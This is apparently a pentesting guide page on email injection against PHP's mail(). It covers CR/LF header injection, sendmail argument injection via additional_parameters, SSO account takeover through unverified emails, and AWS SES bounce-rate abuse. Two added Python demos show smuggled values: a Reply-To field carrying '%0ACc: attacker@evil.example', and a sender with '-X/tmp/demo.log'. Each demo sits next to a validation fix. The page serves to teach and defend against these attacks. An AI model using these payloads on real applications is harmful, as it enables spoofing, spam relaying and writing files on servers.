**Learn AWS hacking from zero to hero with** [**htARTE (HackTricks AWS Red Team Expert)**](https://training.hacktricks.xyz/courses/arte)**!**
The PHP `mail()` function is commonly used to send email from a web application. If user input reaches its arguments without validation, the application is vulnerable to email header injection: the attacker appends header lines of their own to the message, which lets them add recipients, spoof the apparent sender and otherwise control how the mail is delivered. Header injection by itself does not execute code on the server; code execution is a separate problem with the fifth argument, `additional_parameters`, discussed below.
To exploit this, the attacker needs a web application that passes user input into `mail()` without sanitizing it. Mail headers are separated by line breaks, so the characters that matter in the payload are CR (`\r`, `%0D` when URL-encoded) and LF (`\n`, `%0A`): a line break followed by a `Header-Name: value` sequence starts a new header.
The payload can land in the `to`, `subject` or `additional_headers` arguments. PHP replaces control characters in `to` and `subject` with spaces, so in practice the `additional_headers` string (for example a user-controlled `From:` or `Reply-To:` value that the application concatenates into it) is where an injected line break survives. By adding headers the attacker can choose extra recipients (`Cc:`, `Bcc:`), change the visible sender or redirect replies.
For example, an attacker can inject a line break followed by a `Cc:` header to have a copy of the email sent to a different recipient.
When `mail()` is called with these values, the MTA sees a valid additional header and delivers the message to both the intended recipient and the attacker.
To prevent email injection, validate user input before it reaches `mail()`: reject (rather than silently strip) any header value containing CR or LF, and check addresses against a strict format.
Additionally, prefer a maintained mail library that builds headers itself and refuses line breaks in header values over hand-assembled header strings.
By exploiting a vulnerable `mail()` call an attacker can send mail to recipients of their choice, spoof headers and use the application as a spam or phishing relay. Developers must treat every value that ends up in a header as untrusted and validate it.
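The following is an added example, not code from the original page: it models an application that concatenates a user-supplied value into a mail header (the same shape as building the `$headers` string for `mail()`), parses the resulting header block the way an MTA would to show the injected `Cc:` becoming a real header, and contrasts it with the check a hardened application applies. The form field, addresses and the `build_headers` helper are constructed for the demonstration.

```python
"""Added example (not from the original page): header injection through a
newline in user input that an application concatenates into mail headers,
plus the check a hardened application applies before calling mail().

The application shape is assumed: a PHP app would do the equivalent with
mail($to, $subject, $body, $headers); here the header block is built in
Python so its effect can be parsed and inspected offline."""
from email.parser import HeaderParser
from urllib.parse import unquote
import re

# Any CR or LF inside a single header value is a header-injection attempt.
CRLF_RE = re.compile(r"[\r\n]")


def build_headers(to: str, subject: str, reply_to: str) -> str:
    """Naive header assembly: user-controlled values are concatenated as-is.
    This is the vulnerable pattern; it mirrors an app that builds the
    additional_headers string of mail() from form fields."""
    return (
        f"To: {to}\r\n"
        f"Subject: {subject}\r\n"
        f"Reply-To: {reply_to}\r\n"
        "\r\n"
    )


def recipients(raw_headers: str) -> dict:
    """Parse the header block the way an MTA would and report who gets a copy."""
    msg = HeaderParser().parsestr(raw_headers)
    return {
        "to": msg.get_all("To", []),
        "cc": msg.get_all("Cc", []),
        "bcc": msg.get_all("Bcc", []),
    }


def safe_header_value(value: str) -> str:
    """Hardened form: reject any value that could start a new header line."""
    if CRLF_RE.search(value):
        raise ValueError("CR/LF in header value: refusing possible header injection")
    return value


def demo() -> dict:
    # Constructed sample input: a form field as received by the web app, with
    # the newline URL-encoded as %0A the way a browser would send it.
    form_reply_to = "support@example.com%0ACc: attacker@evil.example"
    reply_to = unquote(form_reply_to)

    # Vulnerable path: the value goes straight into the header block.
    vulnerable = recipients(build_headers("victim@example.com", "Hello", reply_to))

    # Hardened path: the same value is refused before mail() is ever called.
    try:
        safe_header_value(reply_to)
        hardened = "accepted"
    except ValueError:
        hardened = "rejected"

    return {"vulnerable": vulnerable, "hardened": hardened}


if __name__ == "__main__":
    print(demo())
```

Running it shows `attacker@evil.example` appearing as a `Cc` recipient although the application only ever set a `Reply-To` header; the hardened check rejects the value outright instead of stripping the line break, so a malformed input fails loudly rather than being delivered in a mangled form.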
The fifth `mail()` argument, `additional_parameters`, is appended to the command line PHP uses to invoke sendmail. PHP passes it through `escapeshellcmd()` first, which escapes shell metacharacters but not spaces or leading dashes, so a value such as `-f` followed by attacker-controlled text can still hand extra command-line options to the sendmail binary.
The **sendmail** interface is provided by whichever MTA (Sendmail, Postfix, Exim, etc.) is installed on the system. While the **basic functionality** (options such as `-t`, `-i` and `-f`) stays **the same** for compatibility, **other options and their behaviour** differ substantially between MTAs.
Depending on which MTA's **sendmail** binary is installed, different options have been found that can be abused to **leak files or even execute arbitrary commands**. See how in [**https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html**](https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html)
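The following is an added example, not code from the original page or the linked paper: it approximates PHP's `escapeshellcmd()` using the character list from the PHP manual to show that a user-controlled `-f` value still reaches sendmail as separate options (because spaces and dashes are not escaped), and contrasts it with an allow-list check on the envelope sender. The sample sender value, the `-X` option used as the injected token (sendmail's documented transaction-log option) and the helper names are constructed for the demonstration; the escaping function is an approximation, not PHP itself.

```python
"""Added example (not from the original page): why passing a user-controlled
value into the fifth mail() argument (additional_parameters) is dangerous even
though PHP runs it through escapeshellcmd(), and an allow-list check that
blocks it.

php_escapeshellcmd_approx() follows the character list the PHP manual gives
for escapeshellcmd(); quote pairing is simplified (a quote is escaped only
when unpaired), so it is an approximation of PHP's behaviour, not PHP itself."""
import re

# Characters escapeshellcmd() prefixes with a backslash, per the PHP manual.
_SHELL_META = set("&#;`|*?~<>^()[]{}$\\\x0a\xff")

# Strict envelope-sender format: one address, no whitespace, no leading dash.
_SENDER_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._%+-]*@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


def php_escapeshellcmd_approx(s: str) -> str:
    """Approximation of PHP escapeshellcmd(): backslash the documented
    metacharacters; spaces, dashes and slashes pass through untouched."""
    out = []
    for ch in s:
        if ch in _SHELL_META:
            out.append("\\" + ch)
        elif ch in "'\"":
            out.append(ch if s.count(ch) % 2 == 0 else "\\" + ch)
        else:
            out.append(ch)
    return "".join(out)


def sendmail_argv(additional_parameters: str) -> list:
    """Arguments the sendmail binary receives. PHP builds the command
    '<sendmail_path> <escaped additional_parameters>' and the shell splits it
    on whitespace, so every whitespace-separated token becomes its own argument."""
    return php_escapeshellcmd_approx(additional_parameters).split()


def injected_options(additional_parameters: str) -> list:
    """Extra options that reach sendmail beyond the single -f the app intended."""
    return [tok for tok in sendmail_argv(additional_parameters)[1:] if tok.startswith("-")]


def safe_additional_parameters(sender: str) -> str:
    """Hardened form: validate the envelope sender against a strict pattern and
    build the option string server-side, so no user text can become an option."""
    if not _SENDER_RE.match(sender):
        raise ValueError(f"invalid envelope sender: {sender!r}")
    return f"-f{sender}"


def demo() -> dict:
    # Constructed sample: the app does "-f" . $_POST['from'] and the attacker
    # appends sendmail's documented -X option, which writes the transaction
    # log to a file of their choosing (the linked paper shows where that leads).
    user_from = "bob@example.com -X/tmp/demo.log"
    vulnerable = injected_options("-f" + user_from)
    try:
        safe_additional_parameters(user_from)
        hardened = "accepted"
    except ValueError:
        hardened = "rejected"
    return {
        "escaped": php_escapeshellcmd_approx("-f" + user_from),
        "injected": vulnerable,
        "hardened": hardened,
    }


if __name__ == "__main__":
    print(demo())
```

The point of the comparison: `escapeshellcmd()` defends against shell command injection (a `;` or backtick is neutralised), but argument injection into sendmail needs nothing more than a space, which it leaves alone. Validating the sender with a strict pattern and constructing the `-f` option server-side removes the attacker's ability to introduce a second token at all.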
Some services such as **github** or **salesforce allow** you to create an email address with an XSS payload in it. If you can **use these providers to log in to other services** and those services **do not sanitize** the email address correctly, you can trigger **XSS**.
If an **SSO service** lets you **create an account without verifying the supplied email address** (as **salesforce** does) and you can then use that account to log in to another service that **trusts** salesforce, you may be able to take over any account.\
Note that salesforce does indicate whether the supplied email address has been verified, but the relying application has to actually check that information.
You can send an email with _**From: company.com**_ and _**Reply-To: attacker.com**_; if an **automatic reply** is generated because the mail appears to come **from** an **internal address**, the **attacker** can **receive** that reply.
Some services, such as AWS, enforce a threshold known as the **hard bounce rate**, typically set at 10%. This is a key metric for email delivery services: when it is exceeded, a service such as AWS SES may pause or block the account's ability to send.
A **hard bounce** is an **email** returned to the sender because the recipient address is invalid or does not exist. This can happen for several reasons, such as the mail being sent to a nonexistent mailbox, to a domain that does not exist, or to a receiving server that refuses to accept it.
In the AWS context, if you send 1000 emails and 100 of them hard-bounce (because of invalid addresses or domains), that is a 10% hard bounce rate. Reaching or exceeding this rate can lead AWS SES (Simple Email Service) to block or suspend your ability to send email. From an attacker's point of view, any feature that lets you make the application send mail to addresses you choose (for example a registration or invitation form without address verification) can be used to push a victim's bounce rate over this threshold.
Keeping the hard bounce rate low is essential for uninterrupted email delivery and sender reputation. Monitoring and managing the quality of the addresses on your mailing list goes a long way towards that.
For more information, see the official AWS documentation on handling bounces and complaints at [AWS SES Bounce Handling](https://docs.aws.amazon.com/ses/latest/DeveloperGuide/notification-contents.html#bounce-types).